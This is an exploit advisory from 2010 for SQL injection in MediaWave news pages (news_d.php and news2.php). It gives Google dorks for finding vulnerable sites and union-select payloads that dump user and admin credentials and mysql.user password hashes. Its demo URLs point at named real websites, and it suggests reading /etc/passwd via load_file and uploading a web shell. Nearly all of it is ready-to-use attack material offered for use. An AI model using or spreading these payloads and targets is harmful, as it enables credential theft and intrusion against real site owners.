# Exploit Title: [MediaWave(news)& more SQL injection] # Date: [14-6-2010] # Author: [CaSpErHaK] # Tested on: [linux] ====================Founded By CaSpErHaK=============== Dork in google:- inurl:"news_d.php?id=" and Another:- inurl:"news2.php?id=" # Exploit : 1st............http://[site/path/news_d.php?id={SQLi} ..........for site powered by MediaWave..... # Poc : union select 1,2,concat(ID,0x3a,nome,0x3a,pass),4+from+downloads_user-- ================= # Demo :- http://www.veraqualitas.com/news_d.php?ID=-15+union+select+1,2,concat(ID,0x3a,nome,0x3a,pass),4+from+downloads_user-- ============================================================================================================== ..........for 0ther site....... # Poc : union select 1,2,3,4,5,6,7,8,concat(id,0x3a,loginid,0x3a,password),10,11+from+lon_adminuser-- ================= # Demo :- http://www.levelone.eu/news_d.php?id=-90+union+select+1,2,3,4,5,6,7,8,concat(id,0x3a,loginid,0x3a,password),10,11+from+lon_adminuser-- ================================================================================================================ # u can get to root in some sites from Table "mysql.user" # Demo :- http://www.bedag.ch/news/news_d.php?id=-64+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(user,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user-- ================================================================================================================== /////////////////////////////////////////////////////////////////////////////// # Exploit : 2nd...............http://[site]/path/news2.php?id={SQLi} ........................for site powered by MediaWave............. # Poc : union select 1,2,3,concat(id,0x3a,usr,0x3a,pwd)+from+ssp_usrs-- ================ # Demo :- http://www.aubergeduchasseur.ch/news2.php?ID=-54+union select 1,2,3,concat(id,0x3a,usr,0x3a,pwd)+from+ssp_usrs-- ================================================================================================================ # ................for version 4............ # Poc : union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+users-- # Demo : http://www.almaddbepk.com/news2.php?id=-35+union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+users-- ================================================================================================================ # Note : 1 in u found version "5.0.84-log" from Database....... 0 u can use order SQL "load_file('/etc/passwd') 1 must be magic quotes=OFF by get to folder have chmod 777 u can inject file have extention ".php" 0 and have Remote File Inclusion then u can upload shell.txt? from any site 1 by get to folder have chmod 777 ==================== # Demo : http://www.mediawave.ch/news2_fr.php?ID=25+union+select+1,2,3,4,5,6,7,load_file('/etc/passwd')-- =============================================================================================================== Greetz to>>>>> H4ckforu Team.. KONDAMNE , Mr.Nid4 , Anti-tr4Ck3r , ra3ch & All Muslim KackeRs http://www.h4ckforu.com # Email : Casper_x28[at]hotmail.com